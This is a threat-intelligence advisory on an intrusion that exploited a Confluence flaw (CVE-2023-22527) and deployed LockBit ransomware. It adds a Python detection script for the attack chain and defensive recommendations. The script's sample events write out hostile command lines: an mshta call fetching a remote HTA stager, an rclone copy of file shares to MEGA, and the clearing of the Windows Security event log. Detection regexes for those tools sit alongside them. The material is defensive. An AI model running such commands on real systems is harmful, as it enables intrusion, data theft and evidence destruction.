Hackers Exploit Critical Confluence Server Flaw to Deploy LockBit Ransomware

A recent cyberattack exposed the risks of unpatched servers, as hackers exploited a critical flaw in an Atlassian Confluence instance to deploy LockBit ransomware. The attack leveraged CVE-2023-22527, a remote code execution vulnerability, enabling attackers to run arbitrary commands on the server. This incident underscores the importance of timely patching, robust access controls and proactive cybersecurity defenses.

Technical Description

CVE-2023-22527 is a critical remote code execution (RCE) vulnerability in Atlassian Confluence Data Center and Server, publicly disclosed on January 16, 2024. It stems from improper input handling in the Velocity template engine, allowing unauthenticated attackers to execute arbitrary code via crafted HTTP requests. Exploitation requires only network access to a vulnerable Confluence instance, which makes internet-exposed servers prime targets. Atlassian has released patches, and users are strongly urged to update immediately: delayed patching increases the risk of ransomware deployment, as seen in recent cyberattacks leveraging this vulnerability.

Initial Access and Exploitation of Confluence Flaw:
The intrusion commenced with the exploitation of CVE-2023-22527, a critical server-side template injection (SSTI) vulnerability with a maximum CVSS score of 10.0, targeting an exposed Atlassian Confluence instance. This weakness allowed unauthenticated adversaries to execute arbitrary system commands by injecting malicious Object-Graph Navigation Language (OGNL) expressions via manipulated HTTP POST requests.

The initial indicators of compromise (IoCs) were reconnaissance activities, such as executing system enumeration commands like net user and whoami, which helped the attackers map user privileges and system access levels. After establishing a foothold, the attackers attempted to retrieve AnyDesk using curl, which initially failed. They then pivoted to the Windows mshta utility to execute a remote HTA file embedding a Metasploit stager. This gave them a Meterpreter session, granting command-and-control (C2) capabilities and enabling the download and installation of AnyDesk with a preset password for sustained remote access.

Persistence and Privilege Escalation:
After installing AnyDesk, the attackers configured it for persistence by setting it to start automatically. They quickly enumerated running processes, terminating those linked to a previous intruder but accidentally killing their own Metasploit session, forcing a re-exploitation of Confluence. To maintain access, they created a local admin account, “backup,” and used it for RDP login. They then executed Mimikatz to extract credentials, uncovering a weak “Administrator” password reused across multiple systems, allowing them to move laterally within the network.

Lateral Movement and Data Exfiltration:
The attackers relied heavily on RDP for lateral movement, using SoftPerfect’s NetScan to identify remote hosts. They targeted a backup server, executing Veeam-Get-Creds-New.ps1 to extract credentials from Veeam Backup & Replication. These credentials allowed access to a file share server, where they deployed Rclone to exfiltrate data to MEGA.io. To evade detection, they cleared Windows event logs, deleted introduced tools and manually disabled Windows Defender on compromised hosts.

Deployment of LockBit Ransomware:
In the final stage, the attackers launched LockBit ransomware across the network. They first executed it manually on selected servers via active RDP sessions, then automated its spread using PDQ Deploy from the initial compromised host. PDQ Deploy distributed ransomware binaries and batch scripts over SMB, triggering simultaneous encryption on multiple systems.
To ensure full coverage, they ran a batch script that mounted remote C$ shares, initiating a secondary encryption wave. They then pivoted to an Exchange server, disabling critical services like Exchange and SQL Server before deploying additional ransomware. Files were encrypted with the “.rhddiicoE” extension and a ransom note, “rhddiicoE.README.txt,” was left behind. Finally, they modified desktop backgrounds to display ransom demands.

The attackers strategically employed a range of tools, including Metasploit for initial access and command-and-control, Mimikatz for credential harvesting, and Rclone for data exfiltration, demonstrating a carefully orchestrated attack chain. The deployment of LockBit ransomware was highly coordinated, ensuring widespread disruption and comprehensive encryption across the network.
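As an added detection example (not part of the original write-up), the script below runs a handful of rules derived from the attack chain described above over constructed process-creation events in a simplified Sysmon-style layout (host|parent_image|image|command_line) and reports which stages of the chain were seen on each host. The sample events, the host names and the regular expressions are assumptions for illustration, not vendor signatures or logs from the incident.

```python
import re
from collections import defaultdict

# Constructed sample events (host|parent_image|image|command_line).
# These are illustrative, not telemetry from the incident.
SAMPLE_EVENTS = [
    "CONF01|tomcat9.exe|cmd.exe|cmd.exe /c whoami",
    "CONF01|tomcat9.exe|cmd.exe|cmd.exe /c net user",
    "CONF01|cmd.exe|mshta.exe|mshta.exe http://198.51.100.7/stage.hta",
    "CONF01|cmd.exe|AnyDesk.exe|AnyDesk.exe --install C:\\AnyDesk --start-with-win --set-password",
    "BACKUP01|powershell.exe|powershell.exe|powershell.exe -f Veeam-Get-Creds-New.ps1",
    "FS01|cmd.exe|rclone.exe|rclone.exe copy D:\\Shares mega:dump --transfers 8",
    "FS01|cmd.exe|wevtutil.exe|wevtutil.exe cl Security",
    "WS42|explorer.exe|chrome.exe|chrome.exe --profile-directory=Default",  # benign control
]

# Each rule: (stage name, parent-image regex, command-line regex).
# The patterns are assumptions derived from the tradecraft in the write-up.
RULES = [
    ("recon from Confluence", r"^(java|tomcat)\w*\.exe$", r"\b(whoami|net\s+user)\b"),
    ("mshta remote HTA", r".", r"^mshta(\.exe)?\s+https?://"),
    ("AnyDesk unattended install", r".", r"anydesk.*--(install|set-password)"),
    ("Veeam credential dump", r".", r"veeam-get-creds"),
    ("rclone to MEGA", r".", r"^rclone(\.exe)?\s+(copy|sync)\b.*\bmega:"),
    ("event log clearing", r".", r"^wevtutil(\.exe)?\s+cl\b"),
]

def match_rules(event_line):
    """Return the names of every rule this single event matches."""
    host, parent, image, cmd = event_line.split("|", 3)
    return [stage for stage, parent_re, cmd_re in RULES
            if re.search(parent_re, parent, re.I) and re.search(cmd_re, cmd, re.I)]

def stages_per_host(event_lines):
    """Map each host to the sorted list of distinct attack stages seen on it.
    Hosts with no matching events are omitted."""
    seen = defaultdict(set)
    for line in event_lines:
        host = line.split("|", 1)[0]
        seen[host].update(match_rules(line))
    return {host: sorted(stages) for host, stages in seen.items() if stages}

if __name__ == "__main__":
    # Several distinct stages on one host is a stronger signal than any single hit.
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} stage(s) -> {', '.join(stages)}")
```

A host that accumulates more than one stage (as CONF01 does here) deserves immediate triage; the benign control host produces no hits.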

Conclusion

This attack underscores the critical need for timely patch management, particularly for vulnerabilities like CVE-2023-22527, which facilitated the initial breach. The attackers’ use of Metasploit, Mimikatz, PDQ Deploy, AnyDesk, and Rclone highlights the importance of robust monitoring and detection mechanisms for commonly exploited tools. Implementing strict access controls, enforcing the principle of least privilege and requiring multi-factor authentication (MFA) can significantly reduce credential theft risks.

Enhanced logging of RDP sessions, process creation events and SMB traffic is crucial for early detection of lateral movement and data exfiltration. Additionally, maintaining offline, immutable backups ensures recovery from ransomware attacks, minimizing operational disruption and data loss. A proactive, layered defense strategy is essential to mitigate such sophisticated threats.

Impact

This attack could have severe consequences for organizations, including operational downtime from widespread ransomware encryption, substantial financial losses from ransom demands and costly recovery efforts. The exfiltration of sensitive data to MEGA.io raises serious privacy and compliance concerns, potentially resulting in legal liabilities and reputational damage. The attackers’ rapid execution and advanced tactics expose weaknesses in existing security controls, emphasizing the urgent need for stronger cybersecurity defenses.

IOC and Context Details

Tactic Name: Impact, Persistence, Lateral Movement, Execution, Defense Evasion, Discovery, Credential Access, Initial Access, Command and Control
Technique Name: Data Encrypted for Impact, Create or Modify System Process, Remote Services, Command and Scripting Interpreter, Indicator Removal, System Binary Proxy Execution, Network Share Discovery, Remote System Discovery, System Owner/User Discovery, Process Discovery, System Network Configuration Discovery, Unsecured Credentials, OS Credential Dumping, Exploit Public-Facing Application, Ingress Tool Transfer
Sub-Technique Name: Windows Service, Remote Desktop Protocol, PowerShell, Windows Command Shell, Clear Windows Event Logs, Mshta, Internet Connection Discovery, Credentials In Files, LSASS Memory
Attack Type: Ransomware
Targeted Applications: Atlassian Confluence
Region Impacted: Global
Industry Impacted: All
IOC Hashes:
  SHA256: 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155
  SHA1: a54af16b2702fe0e5c569f6d8f17574a9fdaf197
  MD5: d7addb5b6f55eab1686410a17b3c867b
CVE: CVE-2023-22527

Recommended Actions

1. Patch Management & Vulnerability Mitigation: Apply security patches promptly, especially for CVE-2023-22527 in Confluence. Update all systems regularly to minimize exploitation risks.
2. Network Segmentation & Access Control: Enforce strict network segmentation to limit lateral movement. Apply the principle of least privilege, restricting admin account access to essential functions.
3. Multi-Factor Authentication (MFA) & Credential Security: Enable MFA for RDP, VPNs and other remote access points. Regularly audit and rotate privileged credentials to reduce credential theft risks.
4. Threat Detection & Monitoring: Implement advanced logging for suspicious activities like unusual RDP sessions, SMB file transfers and PowerShell execution. Use EDR solutions to detect and prevent malicious behavior.
5. Remote Access Tool Restrictions: Restrict the use of tools like AnyDesk and control administrative tool installations. Actively monitor and alert on misuse of legitimate software like PDQ Deploy.
6. Data Protection & Backup Strategy: Maintain offline, immutable backups of critical data. Regularly test restoration procedures to ensure data integrity and minimize ransomware impact.
7. Incident Response & Recovery: Develop an incident response plan and test it regularly to ensure quick containment and recovery from cyberattacks.
